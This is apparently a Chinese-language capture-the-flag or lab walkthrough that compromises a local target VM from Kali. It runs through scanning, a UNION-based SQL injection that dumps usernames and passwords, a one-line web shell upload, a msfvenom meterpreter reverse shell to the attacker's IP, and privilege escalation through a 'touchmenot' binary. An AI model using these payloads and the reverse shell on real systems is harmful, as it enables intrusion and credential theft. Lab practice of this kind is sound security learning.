靶机ip 192.168.41.145
kali ip 192.168.41.130
全部为NAT模式
一信息收集
步骤一:扫描存在的主机ip
arpscan -l
步骤二 扫描发现主机的开放端口
masscan --rate=100000 -p 0-65535 192.168.41.145
步骤三 敏感目录扫描
dirb http://192.168.41.145
二漏洞探测
步骤一:访问ip地址发现有登陆界面和注册界面 注册一个账号登录 尝试sql注入
步骤二:在对话 分别输入 OSINT OSINT' OSINT’ # 确定存在sql字符型注入
步骤三:判断字段
OSINT' order by 3# //正常输出
OSINT' order by 4# //未输出
步骤四:爆出库名
OSINT' UNION SELECT DATABASE(),2,3#
步骤五:爆表名
-OSINT'union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#
步骤六 :爆字段名
-OSINT' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
步骤七:爆字段内容
-OSINT' union select group_concat(user),group_concat(pasword),3 from users#
三 getshell
步骤一:使用爆破出来的登录名和密码进行登录
步骤二:发现其有上传文件的功能,上传一句话木马文件 并使用蚁剑连接
步骤三:使用kali中的msf生成木马文件 将生成的木马文件上传到蚁剑
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.41.130 lport=4444 -f elf >4444.elf
步骤四:在msf设置监听 将上传的木马文件修改权限后运行
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.41.145
set lport 4444
run
chomd +x 4444.elf
./4444.elf
四 提权
步骤一: 在meterpreter内执行指令:
shell
whoami //查看当前用户
步骤二:切换终端
python -c 'import pty;pty.spawn("/bin/bash")'
步骤三:获取root权限
在home目录下发现文件touchmenot,切换到对应路径下,然后运行文件
cd home/legacy
./touchmenot